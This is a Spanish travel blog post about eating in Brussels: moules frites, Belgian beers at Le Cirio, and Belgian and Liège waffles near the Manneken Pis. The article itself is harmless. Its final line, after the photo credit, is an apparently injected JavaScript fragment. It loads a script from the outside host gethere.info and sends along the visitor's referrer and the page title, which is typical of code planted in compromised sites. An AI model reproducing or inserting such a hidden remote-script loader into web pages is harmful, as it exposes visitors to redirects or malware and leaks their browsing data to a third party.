Sabores de Bruselas

12/05/2014

Moules FritesHay destinos que nos ganan el recuerdo a través de las papilas gustativas; suelen ser lugares dulces, salados, picantes, ácidos, y también algunos que otros, amargos, pero los menos… (podéis inspiraros aquí).  Otros son una combinación de más de un sabor. Pero lo cierto es que estos lugares, a través de su gastronomía, nos dejan una impresión en la memoria.

Le ocurre a Bruselas, que tiene tres sabores en acorde gastronómico: el salado, el amargo y el dulce. Tres sabores para comer en Bruselas: unos mejillones acompañados de cerveza para beber y un postre de chocolate como remate final.

¿Cómo saborear Bruselas?

La ciudad de Bruselas presenta multitud de atractivos turísticos, entre ellos, también, la gastronomía. Así mientras visitamos la famosa Grand Place, Patrimonio de la Humanidad, su ayuntamiento gótico, el Atomium, sus casas de estilo Art Noveau, los murales con personajes de cómics, o el Manneken Pis, nos vendrá en gusto probar algunos de sus sabores más reconocidos. ¡Vamos a comer en Bruselas!

Plato principal

Una de las comidas más típicas de Bruselas son los Moules Frites. Se trata un plato compuesto por mejillones cocidos, salteados con apio, zanahoria, cebolla y pimienta, acompañado de un ejército de patatas fritas. Su sencillez no es sinónimo de simpleza en el sabor; al contrario, se trata de disfrutar directamente de los sabores del mar y como contraste, los de la tierra, los de las patatas. La ración típica suele ser de un kilo y medio por persona, es difícil quedarse con hambre.

Sin alejarse del centro de la ciudad de Bruselas, puedes degustar este plato en “Le- Pré-Salé”.

Una bebida

Si Bélgica es el primer productor de cerveza del mundo, dicen que Bruselas se puede visitar en un vaso de cerveza. También dicen que los belgas toman una media de más de cien litros de cerveza al año, y quizá, en esta bebida amarga esté el motivo de la extraña virtud del Manneken Pis, que no deja de orinar.

img6bruselas

Se necesita un buen paladar para saborear los distintos tipos de cerveza que puedes probar en la ciudad de Bruselas. Las hay suaves, como la Blanche, a la que se le añade limón; otras son afrutadas como la Framboise o fuertes con toque agrio como la Chimay. Encontrarás multitud de bares para hacer una degustación de cervezas belgas; puedes acudir, por ejemplo, a toda una institución como el café Le Cirio, un espléndido escenario rococó para viajar por Bélgica con un vaso en la mano, aunque con moderación y, siempre, mejor, picando algo sólido.

Un postre

El postre perfecto para seguir caminando por la ciudad de Bruselas son los gofres, quizá, el plato más internacional de Bélgica.  ¿Quién no conoce el sabor dulce de un gofre? Delicia en forma de galleta de masa crujiente con sus características celdas de abeja que se bañan en distintos dulces, cremas o chocolate.

Aparte de su condimento, en Bruselas puedes encontrar dos tipos: los gofres belgas y los gofres de Lieja; los primeros más grandes y acompañados que los segundos, más pequeños, crujientes y sin acompañamiento más allá del caramelo líquido que los recubre. Pero, ambos igualmente dulces.

Para probarlos no hay problema, las medievales calles de Bruselas están llenas de puestos ambulantes de gofres; pero uno de los mejores gofres de la ciudad está en un local al lado del Manneken Pis. ¿Resistirás la tentación?

Foto | Med PhotoBlog

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;